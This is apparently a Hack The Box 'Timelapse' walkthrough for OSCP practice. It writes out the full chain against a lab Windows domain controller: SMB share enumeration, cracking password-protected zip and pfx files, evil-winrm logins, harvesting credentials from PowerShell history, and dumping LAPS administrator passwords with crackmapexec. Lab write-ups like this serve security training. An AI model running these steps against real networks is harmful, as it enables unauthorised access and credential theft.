OSCP PREPROTİONS – HTB Timelapse

Timelapse machine is a vulnerable machine with Windows operating system among retired machines and it is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full port scan

At the end of the port scan, we understand that it is an AD machine and there is smb sharing and we detect the “timelapse.htb” domain, we add this domain to the /etc/hosts file and provide smb enumeration.
Crackmapexec smb 10.10.11.152

We detect Crackmapexec DC01 and add it to our etc/hosts file.
Then we add
crackmapexec smb 10.10.11.152
crackmapexec smb 10.10.11.152 –users
crackmapexec smb 10.10.11.152 –shares –users
crackmapexec smb 10.10.11.152 -u ” –shares –users
crackmapexec smb 10.10.11.152 -u ‘.’ –shares –users
crackmapexec smb 10.10.11.152 -u ” -p ” –shares –users
commands, but we did not get any information

We didn’t get much information from the enum4linux tool, let’s use smbclient

With smbclient we saw the shares, it is always best for us to use different tools here.
Then we connected to the /Shares share area and looked at the files in it. We downloaded the remarkable winrm_backup.zip file to our local machine to examine it.

The zip file we want to examine is password protected and we are trying to crack it with john

We decrypted the zip file supremelegacy. We unzipped this file and found a pfx file.
(pfx files are encrypted files used for authentication processes including digital certificates. You can access a network, device, user or specific files).
We tried to extract the keys using the legacyy_dev_auth.pfx file, but it asked us for a password and gave us an error when it was empty. Let’s break the password of this file with john

We found the password for the pfx file as thuglegacy
Now we extract this pfx file.
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt

Then we connect with evil-winrm
evil-winrm -i 10.10.11.152 -S -k legacyy_dev_auth.key-enc -c legacyy_dev_auth.crt

Here we have obtained our user flag but we could not access it when using adminsitrator Here we got permissiondenied error so we provide local enumeration.

We’re looking at the Powershell histoyry file

Here we detected svc_deploy and the password ‘E3R$Q62^12p7PLlC%KWaxuaV’

Let’s connect with evil-winrm using this credential

Here we are connected but still cannot log in to the administrator user
We continue to local enumeration

Here *LAPS_Readers is remarkable

LAPS provides management of local account passwords for computers joined in the active directory. Passwords are stored in Active Directory.
Let’s understand how to do privilege escalation here
https://0xdf.gitlab.io/2022/08/20/htb-timelapse.html
Let’s dump the passwords in LAPS with crackmapexec as shown in
crackmapexec ldap 10.10.11.152 -u svc_deploy -p ‘E3R$Q62^12p7PLlC%KWaxuaV’ –kdcHost 10.10.11.152 -M lap

](Qr9{{$2Vkn,8,t@i[g7+Rs password dump.
Here we are connected from the administrator user
We did not see root.txt under Administrator folders, we detected root flags under C:\Users\TRX\desktop directory.

Here we got the root flag.